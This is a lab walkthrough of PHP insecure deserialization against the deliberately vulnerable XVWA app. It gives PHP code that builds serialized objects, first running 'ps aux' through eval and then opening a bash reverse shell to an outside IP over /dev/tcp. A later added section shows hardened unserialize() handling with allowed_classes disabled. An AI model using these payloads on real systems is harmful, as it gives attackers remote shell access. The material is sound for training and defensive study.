PHP Insecure Deserialization
The webapp is XVWA and has a section on PHP Object Injection.

Viewing the URL shows that there is a serialized object.

Viewing the source code of the application shows that the inject variable is directly passed to eval.

Create a PHP file with the code below to generate a serialized object, then submit it to the web application.
<?php
class PHPObjectInjection {
    public $inject="system('ps aux');";
}
$obj=new PHPObjectInjection();
var_dump(serialize($obj));
?>

Now that we know the command execution works, it's time for a reverse shell.
<?php
class PHPObjectInjection {
    public $inject="system('/bin/bash -c \'bash -i >& /dev/tcp/192.142.148.2/54321 0>&1\'');";
}
$obj=new PHPObjectInjection();
var_dump(serialize($obj));
?>
Make sure to URL encode the payload and then profit.
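
On the defensive side, the root cause above is request data reaching unserialize() and then a code sink. The following is an added example, not XVWA's code or anything from the original page: it contrasts a plain unserialize() call with a hardened decoder using the allowed_classes option (PHP 7.0+). The __wakeup() trigger, the counter and the helper names contains_object() and decode_untrusted() are assumptions made for illustration.

```php
<?php
// Added example, not XVWA's code. The class name follows this page; the
// __wakeup() body is a harmless stand-in (assumption) for a dangerous sink.
class PHPObjectInjection {
    public $inject = '';
    public static $wakeups = 0;          // counts magic-method invocations
    public function __wakeup() { self::$wakeups++; }
}

// True if a decoded value holds an object at any depth.
function contains_object($value): bool {
    if (is_object($value) || $value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_object($item)) { return true; }
        }
    }
    return false;
}

// Hardened decoder (hypothetical helper): never instantiates classes and
// rejects input that tried to carry an object.
function decode_untrusted(string $raw) {
    $value = unserialize($raw, ['allowed_classes' => false]);
    if ($value === false && $raw !== serialize(false)) {
        throw new InvalidArgumentException('malformed serialized data');
    }
    if (contains_object($value)) {
        throw new InvalidArgumentException('objects are not accepted');
    }
    return $value;
}

// Constructed sample input standing in for the request parameter.
$obj = new PHPObjectInjection();
$obj->inject = 'example';
$input = serialize($obj);

unserialize($input);                     // weak: class is instantiated
echo 'wakeups after plain unserialize: ', PHPObjectInjection::$wakeups, PHP_EOL;

try {
    decode_untrusted($input);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
echo 'wakeups after hardened decode: ', PHPObjectInjection::$wakeups, PHP_EOL;
echo 'plain data still works: ', json_encode(decode_untrusted(serialize(['id' => 7]))), PHP_EOL;
```

Where the application only needs to pass plain data, exchanging it as JSON with json_decode() avoids object instantiation altogether, and no request value should ever reach eval().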
